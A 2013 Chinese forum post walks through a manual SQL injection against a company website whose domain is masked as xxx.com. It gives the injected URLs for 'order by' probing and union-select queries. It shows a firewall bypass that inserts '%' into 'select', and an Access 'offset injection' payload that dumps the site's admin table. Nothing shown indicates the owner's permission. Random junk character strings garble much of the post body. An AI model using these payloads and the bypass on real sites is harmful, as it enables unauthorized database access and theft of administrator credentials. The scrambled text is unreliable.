找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2216|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。) B/ }8 N. a: l' V# z
​
, v2 |# Y9 \0 I/ Z# Q$ M3 l8 D) n& y) t/ p( _* |
顺手加个admin
; C: Q* k- H( e' g​( C& A8 ^. f" m0 o  X* P% H

. R( I0 f" ?6 w$ t' y: I( J2 W默认后台。
7 l; P7 n, g) Y+ a) t# g0 U! ]回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​- ~5 L0 U% @& m& W  W$ B
$ d. Q7 L7 A8 {+ c

7 K$ ?+ K5 H7 G& t
. e5 p1 b! b7 p! `( |/ a所以就不用御剑扫了,待会直接封IP。. u! Q& c+ V% m, H
1 j9 {$ a. ]9 }0 G; n* o
用order by语句判断是否存在注入。" _( k% M, V/ s6 r/ T
http://www.xxx.com /product_show.asp?id=997 order by 1
% o2 k/ W1 |  P/ O5 Ahttp://www.xxx.com /product_show.asp?id=997 order by 100
" S4 |6 w  k$ y9 A4 f现在存在注入,经测试后发现是9个字段。
1 Q: ~% I0 k5 a! e
7 t1 `5 B. `- F2 [接下来进行联合查询,猜是否存在admin表。0 |$ Y! A# P% E9 Y
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
) B# q# b0 j8 g6 P  a9 Y; c+ @7 o8 T# h7 x5 P
- E, |) @- P% p8 r4 J

% P, Q' k1 ~# _  x% [6 Z在select中间加个%,se%lect绕过安全狗。. e/ \. Y  k* o- s5 s5 Z5 X
​5 M* b! Q! @0 C4 ?

' N, k4 Y1 e5 m3 {2 p- ]6 g7 x发现存在admin表,然后开始手工猜常用的字段。8 p- x+ E: I( s1 N5 u& \2 w
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
5 r# z* R( j: K- F; h  A8 G 7 U) u. \, y- r% z- A- K
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
/ I& M( V; A0 u; b% o# T, d9 }
  k( S6 P/ W" \' ~( |: T2 ]3 I8 w科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
6 I3 d9 m" G8 phttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
$ c% L  \4 I7 ?5 A$ I好了,敏感内容出显了。​
. f  I! @5 V9 F5 b5 ~# ^: ]5 x- h# k
. A7 R, D$ a, c* \1 j% G

  J* m" B6 `& @# t% }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表